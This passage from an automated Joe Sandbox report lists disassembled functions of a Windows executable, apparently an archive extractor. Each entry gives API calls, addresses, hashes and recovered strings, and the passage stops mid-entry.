                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 7365ca6fe1e00dd9d75b0388aa6170e1bddc53eab764c0ac0208b385659be4e3
                  • Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
                  • Opcode Fuzzy Hash: 7365ca6fe1e00dd9d75b0388aa6170e1bddc53eab764c0ac0208b385659be4e3
                  • Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 005ADBD5
                    • Part of subcall function 005ADF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 005ADFD6
                    • Part of subcall function 005ADF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 005ADFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 8fb210e389906c9cdb9ecc317be3533b7251999e27d69cbd0ccc0422538c6864
                  • Instruction ID: c695c39944de4635dd9faee6b71a3a63235271a583efc3851a6f416a00f56bae
                  • Opcode Fuzzy Hash: 8fb210e389906c9cdb9ecc317be3533b7251999e27d69cbd0ccc0422538c6864
                  • Instruction Fuzzy Hash: 77A001AA2AD10BBC310872916D5BE7F0B3CF4CAFA1731891EB50B95881AA905C595832
                  APIs
                  • SetCurrentDirectoryW.KERNELBASE(?,005AA587,C:\Users\user\Desktop,00000000,005D946A,00000006), ref: 005AA326
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CurrentDirectory
                  • String ID:
                  • API String ID: 1611563598-0
                  • Opcode ID: efa75f6e2adf078cbba050524c0f66e63a96a9570a810cd9b271b1cbb07c669e
                  • Instruction ID: 7e04b141ca18e2f57998f1eb6453df66e6f0d2a0f0aea555d1d2ea91677ac79e
                  • Opcode Fuzzy Hash: efa75f6e2adf078cbba050524c0f66e63a96a9570a810cd9b271b1cbb07c669e
                  • Instruction Fuzzy Hash: EAA0123019400A5E8B000B30CC09C1576505770702F00D6207002C00A0CB30C818F500
                  APIs
                  • CloseHandle.KERNELBASE(000000FF,?,?,0059968F,?,?,?,?,005C1FA1,000000FF), ref: 005996EB
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 62bbba17b3194b68552dd78d762e196da808b150eceede53566ac391eded7a7f
                  • Instruction ID: 9ce88d8d37a10b79a4560bdac6f2d49781a545871d1d00cee180d16b2e7fd922
                  • Opcode Fuzzy Hash: 62bbba17b3194b68552dd78d762e196da808b150eceede53566ac391eded7a7f
                  • Instruction Fuzzy Hash: 30F05E31556B058FDF308B28D688B92BBE8BB16725F049B1E90E7435E09761684D9B00
                  APIs
                    • Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
                    • Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365
                  • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 005AB971
                  • EndDialog.USER32(?,00000006), ref: 005AB984
                  • GetDlgItem.USER32(?,0000006C), ref: 005AB9A0
                  • SetFocus.USER32(00000000), ref: 005AB9A7
                  • SetDlgItemTextW.USER32(?,00000065,?), ref: 005AB9E1
                  • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 005ABA18
                  • FindFirstFileW.KERNEL32(?,?), ref: 005ABA2E
                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 005ABA4C
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 005ABA5C
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 005ABA78
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 005ABA94
                  • _swprintf.LIBCMT ref: 005ABAC4
                    • Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D
                  • SetDlgItemTextW.USER32(?,0000006A,?), ref: 005ABAD7
                  • FindClose.KERNEL32(00000000), ref: 005ABADE
                  • _swprintf.LIBCMT ref: 005ABB37
                  • SetDlgItemTextW.USER32(?,00000068,?), ref: 005ABB4A
                  • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 005ABB67
                  • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 005ABB87
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 005ABB97
                  • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 005ABBB1
                  • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 005ABBC9
                  • _swprintf.LIBCMT ref: 005ABBF5
                  • SetDlgItemTextW.USER32(?,0000006B,?), ref: 005ABC08
                  • _swprintf.LIBCMT ref: 005ABC5C
                  • SetDlgItemTextW.USER32(?,00000069,?), ref: 005ABC6F
                    • Part of subcall function 005AA63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 005AA662
                    • Part of subcall function 005AA63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,005CE600,?,?), ref: 005AA6B1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                  • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                  • API String ID: 797121971-1840816070
                  • Opcode ID: 468335c66a4aaf8263024f1aaf112a764c4ed5459562b8552203de72af5c6d9f
                  • Instruction ID: cc354cb85e57747c85b85826d00b7a277a169f2248e4afaa389ff18391bc404c
                  • Opcode Fuzzy Hash: 468335c66a4aaf8263024f1aaf112a764c4ed5459562b8552203de72af5c6d9f
                  • Instruction Fuzzy Hash: 3C9161B2144349BFE6219BA0DD49FFF7BACFB8A700F044819B749D2091D7759A08DB62
                  APIs
                  • __EH_prolog.LIBCMT ref: 00597191
                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 005972F1
                  • CloseHandle.KERNEL32(00000000), ref: 00597301
                    • Part of subcall function 00597BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00597C04
                    • Part of subcall function 00597BF5: GetLastError.KERNEL32 ref: 00597C4A
                    • Part of subcall function 00597BF5: CloseHandle.KERNEL32(?), ref: 00597C59
                  • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0059730C
                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0059741A
                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00597446
                  • CloseHandle.KERNEL32(?), ref: 00597457
                  • GetLastError.KERNEL32 ref: 00597467
                  • RemoveDirectoryW.KERNEL32(?), ref: 005974B3
                  • DeleteFileW.KERNEL32(?), ref: 005974DB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                  • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                  • API String ID: 3935142422-3508440684
                  • Opcode ID: cdd3457b52b2cd504a0fe245d2905db39518ce9600fecc4b9133fa8060354d51
                  • Instruction ID: 39c548e90680c37f85d916302fe307ab5bf4eb5e7d020662ae3a3dd29629e397
                  • Opcode Fuzzy Hash: cdd3457b52b2cd504a0fe245d2905db39518ce9600fecc4b9133fa8060354d51
                  • Instruction Fuzzy Hash: 22B1B271914219AEDF20DB64DC49BEE7FB8BF48300F04456AF949E7142E734AA49CB61
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: H_prolog_memcmp
                  • String ID: CMT$h%u$hc%u
                  • API String ID: 3004599000-3282847064
                  • Opcode ID: 366b57a6c821c10f36bcd339333d4b852035dc151d4683d05d2aa77f73269262
                  • Instruction ID: 3013d01f864d5728fc2d905a84307476125366fc066fcd62a30e3d34f1a11552
                  • Opcode Fuzzy Hash: 366b57a6c821c10f36bcd339333d4b852035dc151d4683d05d2aa77f73269262
                  • Instruction Fuzzy Hash: 7632A2715102859FDF14DF74C899AEA3FA5BF55300F44447EFD8A8B282DB74AA48CB60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: __floor_pentium4
                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                  • API String ID: 4168288129-2761157908
                  • Opcode ID: 0a1a0996cc0784b28ef8eed9e81a365f7d55e4ebdfbca9432077ca5fbe2bbdf7
                  • Instruction ID: 1ee24605d6b99a9c5c2af8c85bff211fe02232bd1ef5b729c4fc61781f932618
                  • Opcode Fuzzy Hash: 0a1a0996cc0784b28ef8eed9e81a365f7d55e4ebdfbca9432077ca5fbe2bbdf7
                  • Instruction Fuzzy Hash: 68C23772E086298FDB258F289D457E9BBB5FB84305F1845EAD80DE7240E774BE818F50
                  APIs
                  • __EH_prolog.LIBCMT ref: 005927F1
                  • _strlen.LIBCMT ref: 00592D7F
                    • Part of subcall function 005A137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0059B652,00000000,?,?,?,00010406), ref: 005A1396
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00592EE0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                  • String ID: CMT
                  • API String ID: 1706572503-2756464174
                  • Opcode ID: a0bfcd63cae3a29003fb365949cb7b1cdbd60e3b28a7e5dc72c7c73a374aaf43
                  • Instruction ID: 832c7e92b4bf9990f1635d0fb0cbd1dc24e4d1b0e937e9becf41e145005a1918
                  • Opcode Fuzzy Hash: a0bfcd63cae3a29003fb365949cb7b1cdbd60e3b28a7e5dc72c7c73a374aaf43
                  • Instruction Fuzzy Hash: B062D2715042459FDF28DF28C899AEA3FE1FF55300F09457DEC9A8B282DB70A949CB50
                  APIs
                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 005B8767
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 005B8771
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 005B877E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                  • String ID:
                  • API String ID: 3906539128-0
                  • Opcode ID: 63b49ce842b5a7b5bfd919670ce91259c8e2d0b8ef4bf6b7a1d5cf0ea5eb31c2
                  • Instruction ID: 17e8fde833425d8f2a20112970bb6746077809b85ff0f7fda39d1251b61c08ae
                  • Opcode Fuzzy Hash: 63b49ce842b5a7b5bfd919670ce91259c8e2d0b8ef4bf6b7a1d5cf0ea5eb31c2
                  • Instruction Fuzzy Hash: F731C47590122DABCB21DF64D889BDCBBB8BF58310F5041EAE81CA7250EB709B858F44
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: .
                  • API String ID: 0-248832578
                  • Opcode ID: 5f677281e8451880b56b9d799d7473e7976eb899aa0dff5fad58c5027801135a
                  • Instruction ID: 4d277435280839c987ee6e7d9b3993f8f4009fdfb241eb9fbc328d2cabbca887
                  • Opcode Fuzzy Hash: 5f677281e8451880b56b9d799d7473e7976eb899aa0dff5fad58c5027801135a
                  • Instruction Fuzzy Hash: 5131E4719002496FCB249E79CC89EFBBFBEFB85314F1405A8F52997251EA30AD44CB60
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction ID: aa3215a3283c25f870a4e00f919f5c8bb6ddadc38f73155cc8e2817f677f2bbb
                  • Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
                  • Instruction Fuzzy Hash: DB020B71E002199FDF14CFA9C8806EEBFF5FF88314F25416AE919EB284D731A9418B94
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 005AA662
                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,005CE600,?,?), ref: 005AA6B1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: FormatInfoLocaleNumber
                  • String ID:
                  • API String ID: 2169056816-0
                  • Opcode ID: ce8279a32716d7fdf51795f862412c98ea17a2457c55f233aeed61f4fd5d5fdd
                  • Instruction ID: 592ff18e492810ee9652e3fb4a5d453df8e5fbfb74dc7774c67f9d44aa0c46fb
                  • Opcode Fuzzy Hash: ce8279a32716d7fdf51795f862412c98ea17a2457c55f233aeed61f4fd5d5fdd
                  • Instruction Fuzzy Hash: F7015E36520248BEDB109FA4EC46F9B7BBCFF29710F105422FA4997150D3709A58DBA5
                  APIs
                  • GetLastError.KERNEL32(005A117C,?,00000200), ref: 00596EC9
                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00596EEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ErrorFormatLastMessage
                  • String ID:
                  • API String ID: 3479602957-0
                  • Opcode ID: 82c0cbe1364decfb31f9d288fa8cf946fa852b79fe7988407986f34112d5c4b8
                  • Instruction ID: 72c6d2218a88a8bd0a88167782e29f1ffc8d22310f28fb301d60f2527a8f5fd1
                  • Opcode Fuzzy Hash: 82c0cbe1364decfb31f9d288fa8cf946fa852b79fe7988407986f34112d5c4b8
                  • Instruction Fuzzy Hash: 58D09E36284206BEEE110B748C09F677F547765B42F10C554B256E90D0D9709018A615
                  APIs
                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,005C118F,?,?,00000008,?,?,005C0E2F,00000000), ref: 005C13C1
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID: ExceptionRaise
                  • String ID:
                  • API String ID: 3997070919-0
                  • Opcode ID: eb60ba907eb38fba3a1d7fb528363429cec0b1cd1f7f1572acf2be18f4423142
                  • Instruction ID: b34e0bdc1f3f300ff751c3bf746118b953443d4e40437d0de0df95edd8a79776
                  • Opcode Fuzzy Hash: eb60ba907eb38fba3a1d7fb528363429cec0b1cd1f7f1572acf2be18f4423142
                  • Instruction Fuzzy Hash: C5B12D35610A099FDB19CF68C48AB657FE0FF46364F25865CE899CF2A2C335E981CB44
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd
                  Similarity
                  • API ID:
                  • String ID: gj
                  • API String ID: 0-4203073231
                  • Opcode ID: f54744c0c57e9fd9629d12bffca3d9c7ba7dc5c5bfb5d2f717dd8223a38763b8
                  • Instruction ID: a8cb5a865dfe2e4065ff32fe228d86c012d6175be6cd7468c2481b91f2786aa5
                  • Opcode Fuzzy Hash: f54744c0c57e9fd9629d12bffca3d9c7ba7dc5c5bfb5d2f717dd8223a38763b8
                  • Instruction Fuzzy Hash: 81F1B3B1A083418FD748CF2AD880A1AFBE1BFCC208F19896EF5D8D7711D634E9558B56
                  APIs
                  • GetVersionExW.KERNEL32(?), ref: 0059AD1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                  • Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
